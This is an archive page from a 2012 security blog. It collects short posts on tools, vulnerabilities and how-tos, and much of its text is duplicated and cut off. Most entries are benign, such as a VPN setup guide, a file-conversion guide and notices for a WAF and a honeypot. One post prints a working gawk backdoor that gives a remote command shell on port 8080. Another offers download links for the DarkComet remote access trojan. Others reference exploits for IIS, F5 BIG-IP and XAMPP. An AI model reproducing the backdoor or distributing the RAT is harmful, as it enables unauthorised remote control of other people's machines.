Please download this app. from Source.
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Showing posts with label tool. Show all posts
Showing posts with label tool. Show all posts
Friday, 13 July 2012
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Wednesday, 11 July 2012
Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges
This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.
Let us focus on our own and
Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS
================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
Tuesday, 10 July 2012
Howto: Use openvpn config files on Mac OS X
This post will tell you how to use openvpn and openvpn config file on Mac OSX
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
Monday, 9 July 2012
DNS Changer ทำงานยังไงกันแน่
เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ
ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ
DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)
ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ
DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)
Saturday, 7 July 2012
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Tuesday, 3 July 2012
How to convert CHM files into PDF files in Ubuntu
In the Ubuntu, chm2pdf is a Python script that converts CHM files into PDF files.
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Monday, 2 July 2012
Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
If you want to see the exploit code, please go to the Source.
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
Using beef plugin with Metasploit
1. Run the beef service
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
Wednesday, 27 June 2012
DNSCrypt - encrypts DNS traffic between your computer and OpenDNS
DNSCrypt, as its name suggests, encrypts DNS traffic between your computer and OpenDNS, in the same way SSL turns HTTP traffic into HTTPS encrypted traffic.
Initially, DNSCrypt was announced as being available for Mac only for now, but according to an OpenDNS article posted yesterday, the source code for DNSCrypt was published on GitHub when they've released the Mac preview and even though
Webhoneypot - Web Application Honeypot
DShield.org is offering this honeypot for users to capture automated web application exploits. It is a very simple "semi interactive" honeypot implemented in PHP.
Source: https://code.google.com/p/webhoneypot/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Source: https://code.google.com/p/webhoneypot/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Monday, 25 June 2012
WordPress Application Firewall. Protects against current and future attacks.
WordPress Application Firewall. Protects against current and future attacks. Email notification is disabled by default, notification can be activated and configured in Settings > WP WAF. Go to your WP WAF configuration page.
Source: https://wordpress.org/extend/plugins/wp-waf/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Source: https://wordpress.org/extend/plugins/wp-waf/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
finddomains - discovering domain names/web sites/virtual hosts
FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/
BoNeSi - the DDoS Botnet Simulator
If you want to see demo video of this tool, please go to the Source.
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
Portsplit - Use multiple service in the same port.
Simple TCP port multiplexer (or "port splitter").
Just run "make" to compile. Binary will be in
"src" directory.
See example config file in examples directory.
Source: https://github.com/kheops2713/portsplit
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Just run "make" to compile. Binary will be in
"src" directory.
See example config file in examples directory.
Source: https://github.com/kheops2713/portsplit
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Monday, 18 June 2012
PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
If you want to see a chart, please go to the Source.
Vulnerable Web Applications [36 unique web applications]OWASP BWA http://code.google.com/p/owaspbwa/OWASP Hackademic http://hackademic1.teilar.gr/Butterfly Security Project http://thebutterflytmp.sourceforge.net/Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspxFoundstone Hackme Books http
Vulnerable Web Applications [36 unique web applications]OWASP BWA http://code.google.com/p/owaspbwa/OWASP Hackademic http://hackademic1.teilar.gr/Butterfly Security Project http://thebutterflytmp.sourceforge.net/Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspxFoundstone Hackme Books http
Thursday, 14 June 2012
escanner Escalation Pentesting Tool
escanner is a small tool that helps you thread scan file(s)/directories recursively for possible vulnerability of insecure file permissions that could result on local privilege escalation due to some misconfiguration of operating systen, software vendors or by users. One example, a local attacker can replace/overwrite the original file to a malicious binary that could perform unauthorized actions
Wednesday, 13 June 2012
XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities
$------------------------------------------------------------------------------------------------------------$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.apachefriends.org/en/xampp-windows.html $ Date :06/07/2012 $ Twitter: http://twitter.com/Sangte_amtham$***********************************************
Monday, 11 June 2012
F5 BIG-IP remote root authentication bypass Vulnerability (Update Link and payload for Metasploit)
F5 BIG-IP remote root authentication bypass VulnerabilityCVE reference: CVE-2012-1493Affected platforms: BIG-IP platforms without SCCPVersion: 11.x 10.x 9.xDate: 2012-February-16Security risk: HighVulnerability: F5 BIG-IP remote root authentication bypassResearcher: Florent DaigniereVendor Status: Notified / Patch availableVulnerability Disclosure Policy: https://www.trustmatta.com/advisories/
Subscribe to:
Posts (Atom)